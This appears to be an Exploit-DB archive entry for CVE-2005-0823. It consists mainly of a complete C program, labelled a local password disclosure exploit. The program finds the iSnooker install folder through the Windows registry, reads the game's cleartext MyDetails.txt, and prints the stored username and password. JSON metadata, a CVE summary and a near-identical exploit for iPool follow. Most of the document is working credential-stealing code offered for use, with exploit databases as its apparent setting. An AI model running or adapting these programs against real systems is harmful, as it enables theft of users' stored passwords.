ID EDB-ID:884
Type exploitdb
Reporter Kozan
Modified 2005-03-16T00:00:00
Description
iSnooker <= 1.6.8 Local Password Disclosure Exploit. CVE-2005-0823. Local exploit for windows platform
/*****************************************************************
iSnooker <= v1.6.8 Local Password Disclosure Exploit by Kozan
Application: iSnooker 1.6.8
Vendor:
Memir Software - memirsoftware.com and
The Snooker Club - thesnookerclub.com
Vulnerable Description:
iSnooker 1.6.8 discloses passwords to local users.
Discovered & Coded by Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan@netmagister.com
*****************************************************************/
#include <stdio.h>
#include <string.h>
#include <windows.h>
HKEY hKey;
#define BUFSIZE 100
char prgfiles[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;
int main()
{
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
0,
KEY_QUERY_VALUE,
&hKey) == ERROR_SUCCESS)
{
lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,
(LPBYTE) prgfiles, &dwBufLen);
if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
RegCloseKey(hKey);
printf("An error occured. Can't get password!\n");
return -1;
}
RegCloseKey(hKey);
}
else
{
printf("An error occured. Can't get password!\n");
return -1;
}
printf("\n\niSnooker 1.6.8 Local Password Disclosure Exploit by Kozan\n");
printf("Credits to ATmaCA\n");
printf("kozan@netmagister.com\n");
printf("www.netmagister.com - www.spyinstructors.com\n\n");
char pwdfile[BUFSIZE], username[BUFSIZE], password[BUFSIZE];
strcpy(pwdfile,strcat(prgfiles,"\\TheSnookerClub\\iSnooker\\MyDetails.txt"));
int addr, i, y;
FILE *fp;
char ch[100], ch2[100];
if((fp=fopen(pwdfile,"rb")) == NULL)
{
printf("An error occured. Can't get password!\n");
return -1;
}
fseek(fp,0,0);
for(i=0;i<30;i++)
{
ch[i]=getc(fp);
if(ch[i]==0x0D)
{
ch[i]=NULL;
strcpy(username,ch);
break;
}
}
addr = ftell(fp);
fseek(fp,addr+1,0);
for(y=0;y<30;y++)
{
ch2[y]=getc(fp);
if(ch2[y]==0x0D)
{
ch2[y]=NULL;
strcpy(password,ch2);
break;
}
}
fclose(fp);
printf("Username : %s\n",username);
printf("Password : %s\n",password);
return 0;
}
// milw0rm.com [2005-03-16]
{"id": "EDB-ID:884", "type": "exploitdb", "bulletinFamily": "exploit", "title": "iSnooker <= 1.6.8 - Local Password Disclosure Exploit", "description": "iSnooker <= 1.6.8 Local Password Disclosure Exploit. CVE-2005-0823. Local exploit for windows platform", "published": "2005-03-16T00:00:00", "modified": "2005-03-16T00:00:00", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/884/", "reporter": "Kozan", "references": [], "cvelist": ["CVE-2005-0823"], "lastseen": "2016-01-31T13:06:19", "viewCount": 9, "enchantments": {"score": {"value": 4.9, "vector": "NONE", "modified": "2016-01-31T13:06:19", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-0823"]}, {"type": "exploitdb", "idList": ["EDB-ID:885"]}], "modified": "2016-01-31T13:06:19", "rev": 2}, "vulnersScore": 4.9}, "sourceHref": "https://www.exploit-db.com/download/884/", "sourceData": "/*****************************************************************\r\n\r\niSnooker <= v1.6.8 Local Password Disclosure Exploit by Kozan\r\n\r\nApplication: iSnooker 1.6.8\r\n\r\nVendor:\r\nMemir Software - memirsoftware.com and\r\nThe Snooker Club - thesnookerclub.com\r\n\r\nVulnerable Description:\r\niSnooker 1.6.8 discloses passwords to local users.\r\n\r\nDiscovered & Coded by Kozan\r\nCredits to ATmaCA\r\nWeb : www.netmagister.com\r\nWeb2: www.spyinstructors.com\r\nMail: kozan@netmagister.com\r\n\r\n*****************************************************************/\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <windows.h>\r\n\r\nHKEY hKey;\r\n#define BUFSIZE 100\r\nchar prgfiles[BUFSIZE];\r\nDWORD dwBufLen=BUFSIZE;\r\nLONG lRet;\r\n\r\nint main()\r\n{\r\n if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,\r\n\r\n\"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\",\r\n 0,\r\n KEY_QUERY_VALUE,\r\n &hKey) == ERROR_SUCCESS)\r\n {\r\n\r\n lRet = RegQueryValueEx( hKey, \"ProgramFilesDir\", NULL, NULL,\r\n (LPBYTE) prgfiles, &dwBufLen);\r\n\r\n if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){\r\n RegCloseKey(hKey);\r\n printf(\"An error occured. Can't get password!\\n\");\r\n return -1;\r\n }\r\n\r\n RegCloseKey(hKey);\r\n\r\n }\r\n else\r\n {\r\n printf(\"An error occured. Can't get password!\\n\");\r\n return -1;\r\n }\r\n\r\n printf(\"\\n\\niSnooker 1.6.8 Local Password Disclosure Exploit by Kozan\\n\");\r\n printf(\"Credits to ATmaCA\\n\");\r\n printf(\"kozan@netmagister.com\\n\");\r\n printf(\"www.netmagister.com - www.spyinstructors.com\\n\\n\");\r\n\r\n char pwdfile[BUFSIZE], username[BUFSIZE], password[BUFSIZE];\r\n\r\nstrcpy(pwdfile,strcat(prgfiles,\"\\\\TheSnookerClub\\\\iSnooker\\\\MyDetails.txt\"));\r\n\r\n int addr, i, y;\r\n FILE *fp;\r\n char ch[100], ch2[100];\r\n\r\n if((fp=fopen(pwdfile,\"rb\")) == NULL)\r\n {\r\n printf(\"An error occured. Can't get password!\\n\");\r\n return -1;\r\n }\r\n\r\n fseek(fp,0,0);\r\n\r\n for(i=0;i<30;i++)\r\n {\r\n ch[i]=getc(fp);\r\n if(ch[i]==0x0D)\r\n {\r\n ch[i]=NULL;\r\n strcpy(username,ch);\r\n break;\r\n }\r\n }\r\n\r\n addr = ftell(fp);\r\n fseek(fp,addr+1,0);\r\n\r\n for(y=0;y<30;y++)\r\n {\r\n ch2[y]=getc(fp);\r\n if(ch2[y]==0x0D)\r\n {\r\n ch2[y]=NULL;\r\n strcpy(password,ch2);\r\n break;\r\n }\r\n }\r\n\r\n fclose(fp);\r\n\r\n printf(\"Username : %s\\n\",username);\r\n printf(\"Password : %s\\n\",password);\r\n\r\n return 0;\r\n}\n\n// milw0rm.com [2005-03-16]\n", "osvdbidlist": ["14838"]}
{"cve": [{"lastseen": "2020-12-09T19:22:19", "description": "ThePoolClub (1) iPool and (2) iSnooker 1.6.81 and earlier stores usernames and passwords in cleartext in the MyDetails.txt file, which allows local users to gain privileges.", "edition": 5, "cvss3": {}, "published": "2005-05-02T04:00:00", "title": "CVE-2005-0823", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-0823"], "modified": "2017-07-11T01:32:00", "cpe": ["cpe:/a:thepoolclub:isnooker:1.6.8", "cpe:/a:thepoolclub:ipool:1.6.81"], "id": "CVE-2005-0823", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0823", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:thepoolclub:ipool:1.6.81:*:*:*:*:*:*:*", "cpe:2.3:a:thepoolclub:isnooker:1.6.8:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T13:06:28", "description": "iPool <= 1.6.81 Local Password Disclosure Exploit. CVE-2005-0823. Local exploit for windows platform", "published": "2005-03-16T00:00:00", "type": "exploitdb", "title": "iPool <= 1.6.81 - Local Password Disclosure Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0823"], "modified": "2005-03-16T00:00:00", "id": "EDB-ID:885", "href": "https://www.exploit-db.com/exploits/885/", "sourceData": "/*****************************************************************\r\n\r\niPool <= v1.6.81 Local Password Disclosure Exploit by Kozan\r\n\r\nApplication: iPool 1.6.81\r\n\r\nVendor:\r\nMemir Software - memirsoftware.com and\r\nThe Pool Club - thepoolclub.com\r\n\r\nVulnerable Description:\r\niPool 1.6.81 discloses passwords to local users.\r\n\r\nDiscovered & Coded by Kozan\r\nCredits to ATmaCA\r\nWeb : www.netmagister.com\r\nWeb2: www.spyinstructors.com\r\nMail: kozan@netmagister.com\r\n\r\n*****************************************************************/\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <windows.h>\r\n\r\nHKEY hKey;\r\n#define BUFSIZE 100\r\nchar prgfiles[BUFSIZE];\r\nDWORD dwBufLen=BUFSIZE;\r\nLONG lRet;\r\n\r\nint main()\r\n{\r\n if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,\r\n\r\n\"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\",\r\n 0,\r\n KEY_QUERY_VALUE,\r\n &hKey) == ERROR_SUCCESS)\r\n {\r\n\r\n lRet = RegQueryValueEx( hKey, \"ProgramFilesDir\", NULL, NULL,\r\n (LPBYTE) prgfiles, &dwBufLen);\r\n\r\n if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){\r\n RegCloseKey(hKey);\r\n printf(\"An error occured. Can't get password!\\n\");\r\n return -1;\r\n }\r\n\r\n RegCloseKey(hKey);\r\n\r\n }\r\n else\r\n {\r\n printf(\"An error occured. Can't get password!\\n\");\r\n return -1;\r\n }\r\n\r\n printf(\"\\n\\niPool 1.6.81 Local Password Disclosure Exploit by Kozan\\n\");\r\n printf(\"Credits to ATmaCA\\n\");\r\n printf(\"kozan@netmagister.com\\n\");\r\n printf(\"www.netmagister.com - www.spyinstructors.com\\n\\n\");\r\n\r\n char pwdfile[BUFSIZE], username[BUFSIZE], password[BUFSIZE];\r\n strcpy(pwdfile,strcat(prgfiles,\"\\\\ThePoolClub\\\\iPool\\\\MyDetails.txt\"));\r\n\r\n int addr, i, y;\r\n FILE *fp;\r\n char ch[100], ch2[100];\r\n\r\n if((fp=fopen(pwdfile,\"rb\")) == NULL)\r\n {\r\n printf(\"An error occured. Can't get password!\\n\");\r\n return -1;\r\n }\r\n\r\n fseek(fp,0,0);\r\n\r\n for(i=0;i<30;i++)\r\n {\r\n ch[i]=getc(fp);\r\n if(ch[i]==0x0D)\r\n {\r\n ch[i]=NULL;\r\n strcpy(username,ch);\r\n break;\r\n }\r\n }\r\n\r\n addr = ftell(fp);\r\n fseek(fp,addr+1,0);\r\n\r\n for(y=0;y<30;y++)\r\n {\r\n ch2[y]=getc(fp);\r\n if(ch2[y]==0x0D)\r\n {\r\n ch2[y]=NULL;\r\n strcpy(password,ch2);\r\n break;\r\n }\r\n }\r\n\r\n fclose(fp);\r\n\r\n printf(\"Username : %s\\n\",username);\r\n printf(\"Password : %s\\n\",password);\r\n\r\n return 0;\r\n}\n\n// milw0rm.com [2005-03-16]\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/885/"}]}
